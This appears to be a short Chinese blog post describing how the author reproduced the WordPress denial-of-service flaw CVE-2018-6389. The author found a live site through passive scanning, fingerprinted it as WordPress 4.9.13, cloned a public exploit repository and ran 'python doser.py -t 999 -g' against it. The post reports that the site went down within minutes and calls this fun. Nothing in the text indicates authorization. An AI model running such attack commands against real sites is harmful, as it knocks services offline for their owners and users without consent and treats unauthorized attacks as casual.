WordPress拒绝服务攻击复现(CVE-2018-6389)

不起跬步,无以至千里;不积小流,无以成江海


xray开着被动扫描,发现有个爆红了

Assassins小白

看了看也没啥重要的东西,寻思着好不容易报个红,就看看这个站吧

然后Whatweb上去扫,发现使用的CMS是wordpress ,版本是4.9.13

Assassins小白

之前一个朋友用wordpress的一个拒绝服务漏洞,搞了个腾讯的子站交SRC,然后我寻思这个站有没有漏洞

然后就去GitHub上面搜索,发现WordPress 4.9.x版本以下都存在拒绝服务攻击,包括4.9.x

Assassins小白

这个站版本是 4.9.13 ,那还废啥话

克隆

git clone https://github.com/ianxtianxt/CVE-2018-6389.git

攻击

python doser.py -t 999 -g 'https://domain.com'

因为我之前执行过攻击命令,现在演示还要重新执行一遍

history 查看历史命令

Assassins小白

然后在命令行中,可以使用符号 ! 执行指定序号的历史命令

例如,我这里要执行第331个历史命令,则输入 !331 就行了

没过几分钟,网站就真的被打死了,还挺好玩

Assassins小白